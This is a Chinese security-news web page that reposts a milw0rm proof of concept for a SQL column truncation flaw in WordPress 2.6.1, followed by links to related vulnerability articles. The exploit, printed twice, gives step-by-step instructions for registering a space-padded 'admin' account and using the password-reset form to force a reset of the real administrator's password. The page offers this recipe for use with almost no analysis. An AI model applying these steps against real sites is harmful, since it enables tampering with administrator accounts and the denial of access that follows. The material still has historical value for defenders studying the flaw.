您现在的位置是:网站首页> 编程资料编程资料
WordPress 2.6.1 SQL Column Truncation Vulnerability分析 _漏洞分析_网络安全_
2023-05-24
341人已围观
简介 WordPress 2.6.1 SQL Column Truncation Vulnerability分析 _漏洞分析_网络安全_
用wordpress的要注意了,不过拿我这里测试就没效果了,我从一开始就是关闭用户注册的。 # WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
#
# found by irk4z[at]yahoo.pl
# homepage: http://irk4z.wordpress.com/
#
# this is not critical vuln [;
#
# first, read this discovery:
# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
#
# in this hack we can remote change admin password, if registration enabled
#
# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends 1. go to url: server.com/wp-login.php?action=register 2. register as: login: admin x
email: your email^ admin[55 space chars]x now, we have duplicated 'admin' account in database 3. go to url: server.com/wp-login.php?action=lostpassword 4. write your email into field and submit this form 5. check your email and go to reset confirmation link 6. admin's password changed, but new password will be send to correct admin email ;/ # milw0rm.com
#
# found by irk4z[at]yahoo.pl
# homepage: http://irk4z.wordpress.com/
#
# this is not critical vuln [;
#
# first, read this discovery:
# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
#
# in this hack we can remote change admin password, if registration enabled
#
# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends 1. go to url: server.com/wp-login.php?action=register 2. register as: login: admin x
email: your email^ admin[55 space chars]x now, we have duplicated 'admin' account in database 3. go to url: server.com/wp-login.php?action=lostpassword 4. write your email into field and submit this form 5. check your email and go to reset confirmation link 6. admin's password changed, but new password will be send to correct admin email ;/ # milw0rm.com
相关内容
- Discuz!NT 2.5最新注入漏洞测试分析(图) _漏洞分析_网络安全_
- QuickTime 0day 攻击代码发布 _漏洞分析_网络安全_
- PHPCMS2007 SP6 vote模块SQL注射漏洞的分析 _漏洞分析_网络安全_
- MS08-052 WMF漏洞分析(图) _漏洞分析_网络安全_
- Windows Vista中IE漏洞击穿系统分析 _漏洞分析_网络安全_
- Trillian XML解析器DTD文件缓冲区溢出漏洞 _漏洞分析_网络安全_
- Sun Solaris自封装IP报文远程拒绝服务漏洞 _漏洞分析_网络安全_
- IE 0day漏洞 问题出自MS Works _漏洞分析_网络安全_
- Libpng库未知类型块处理远程代码执行漏洞 _漏洞分析_网络安全_
- MirOS BSD Korn Shell本地权限提升漏洞 _漏洞分析_网络安全_
